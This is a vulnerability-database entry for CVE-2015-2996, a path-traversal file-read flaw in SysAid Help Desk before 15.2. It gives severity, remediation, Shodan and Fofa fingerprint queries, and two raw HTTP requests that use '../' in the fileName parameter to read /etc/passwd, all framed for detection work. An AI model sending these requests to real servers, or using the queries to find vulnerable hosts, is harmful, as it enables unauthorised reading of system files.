🔙 목록으로 돌아가기

CVE-2015-2996: SysAid Help Desk <15.2 - Local File Inclusion

TitleSysAid Help Desk <15.2 - Local File Inclusion
Author0x_Akoko
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could allow an attacker to read sensitive files on the server.
RemediationUpgrade SysAid Help Desk to version 15.2 or later to mitigate the vulnerability.
CVSS Score8.5
EPSS Score0.89001
CVE IDCVE-2015-2996
CWE IDCWE-22
Shodan Queryhttp.favicon.hash:1540720428
Fofa Queryicon_hash=1540720428
Tags cve2015 cve sysaid lfi seclists vuln

🔍 Vulnerability Description

SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.

🌐 HTTP Request

GET /sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /getGfiUpgradeFile?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.6.25
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-2996.yaml

🦈 Packet Capture: ⬇️ Download cve-2015-2996.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A